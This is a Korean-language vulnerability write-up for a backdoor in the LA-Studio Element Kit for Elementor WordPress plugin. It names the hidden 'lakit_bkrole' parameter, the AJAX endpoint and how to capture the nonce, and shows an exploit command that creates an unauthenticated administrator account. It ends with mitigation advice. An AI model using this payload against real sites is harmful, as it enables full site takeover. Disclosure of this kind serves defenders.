
최근 LA-Studio Element WordPress 플러그인의 취약점에 대한 설명과 페이로드입니다.
LA-Studio Element Kit for Elementor(버전 ≤ 1.5.6.3)에서 발견된 치명적인 백도어에 대한 기술 분석 및 개념 증명(PoC)입니다. 이 취약점은 인증되지 않은 관리자 계정 생성을 허용합니다.
전 직원이 ajax_register_handle 함수에 의도적으로 백도어를 삽입하여, 등록 과정에서 숨겨진 파라미터를 사용해 사용자 권한을 상승시킬 수 있게 했습니다.
취약점 유형: 부적절한 권한 부여 / 의도적 백도어.
대상 함수: ajax_register_handle.
백도어 파라미터: lakit_bkrole.
영향: 전체 사이트 장악(Full Site Takeover).
주요 요구 사항:
유효한 WordPress AJAX nonce(_nonce).
administrator로 설정된 lakit_bkrole 파라미터.
Nonce 캡처: 합법적인 등록 요청을 가로채거나 페이지 소스를 검사하여 lakit_ajax 액션에 대한 _nonce를 찾습니다.

익스플로잇 실행: 대상 URL, 캡처된 nonce, 원하는 자격 증명을 제공하여 Python 스크립트를 실행합니다.

명령어 예시:
python CVE-2026-0920.py -u https://spoilhouses.s2-tastewp.com -n b935edabf2 -ua "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/139.0.0.0 Safari/537.36" --user "john_admin" --passw "ComplexPass123"
터미널 출력:
Plaintext SUCCESS: john_admin created.
결과: 새 사용자 john_admin이 Administrator 프로필로 WordPress 사용자 패널에 표시됩니다.

가로챈 요청은 백도어가 어떻게 트리거되는지 보여줍니다:
엔드포인트: /wp-admin/admin-ajax.php.
액션: lakit_ajax.
악성 데이터: actions 파라미터 내부의 JSON 문자열에 "lakit_bkrole":"administrator"가 명시적으로 포함되어 있으며, 플러그인은 이를 처리하여 전체 사이트 권한을 부여합니다.
🛠️ 완화 조치 업데이트: 즉시 v1.6.0으로 업그레이드하세요.
감사: wp_users 테이블에서 john_admin과 같이 최근에 생성된 승인되지 않은 관리자가 있는지 검토하세요.
정리: 발견된 의심스러운 계정을 모두 제거하고 모든 합법적인 관리자 비밀번호를 교체하세요.